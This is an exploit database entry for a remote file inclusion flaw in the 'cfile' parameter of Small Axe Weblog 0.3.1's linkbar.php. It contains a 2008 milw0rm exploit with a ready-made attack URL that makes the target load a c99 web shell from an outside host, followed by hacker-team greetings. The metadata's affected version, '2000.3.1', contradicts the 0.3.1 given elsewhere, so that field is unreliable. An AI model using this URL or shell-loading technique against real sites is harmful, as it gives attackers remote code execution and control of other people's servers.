Small Axe Weblog 0.3.1 Remote File Include

vendor:

Small Axe Weblog

by:

RoMaNcYxHaCkEr

9.3

CVSS

HIGH

Remote File Include

CWE

Product Name: Small Axe Weblog

Affected Version From: 2000.3.1

Affected Version To: 2000.3.1

Patch Exists: NO

Related CWE: N/A

CPE: a:small_axe_solutions:small_axe_weblog:0.3.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Small Axe Weblog 0.3.1 Remote File Include

Small Axe Weblog 0.3.1 is vulnerable to a remote file include vulnerability. This vulnerability exists due to insufficient sanitization of user-supplied input in the 'cfile' parameter of the 'linkbar.php' script. An attacker can exploit this vulnerability by sending a malicious URL in the 'cfile' parameter. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.

Source

Exploit-DB raw data:

# Name : Small Axe Weblog 0.3.1  Remote File Include
# Download From : http://releases.smallaxesolutions.com/smallaxe-0.3.1.zip
# Found By : RoMaNcYxHaCkEr                  We Are H-T TeaM (Houssamix - ToXiC)
# Home Page : Not Yet  :(      Tryag.cc/cc        No-Hack.net     V99x.com/vb               Hackteach.org/cc     

============================================================================

# Vulne Code In File linkbar.php In Line 1 :


include_once($cfile);

# Exploit :

http://Www.RxH.CoM/smallaxe-0.3.1/inc/linkbar.php?cfile=http://no-hack.net/shells/c99.txt?

That,s It,s

Good Luck Everybody
============================================================================

# Greet To :

"Cold Z3ro My Master , !!Hack-back!!" (Hackteach.org)

Tryag TeaM :"Mahmood_ali , cRMINEL_NET , Mohajer22 , Dr-Ha!l , LoVeRs Hacker , Abdullah00 , Athabi Ker , Mr-Wolf ...etc"  (Tryag.com)

Hack15 TeaM :"GeNiUs-HaCkEr , Mr-AljoOOker , Mr-Shares , So9or , KsA HaCkEr ...etc" (V99x.com)

Sniper-Sa TeaM :"Sniper-sa , Golden-Hacker , Sho3ter , VerySecret , nOUR-Ice ....etc"(Sniper-sa.com)

Yee7 TeaM : "ShockShadow ( My Best Friend ), HoUrIcAn , ...etc"(Yee7.com)

H-T TeaM : " Houusamix , ToXiC "(no-hack.net)

Str0ck (Milw0rm.com)

Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye , AlQaTaRi , God-Father And All My Friends

# For Contact : RxH@HotMail.iT

# Note : Alwayse Don,t See In The Top To Feeling Pain In Your Neck !!!

Best Wishes

# milw0rm.com [2008-01-18]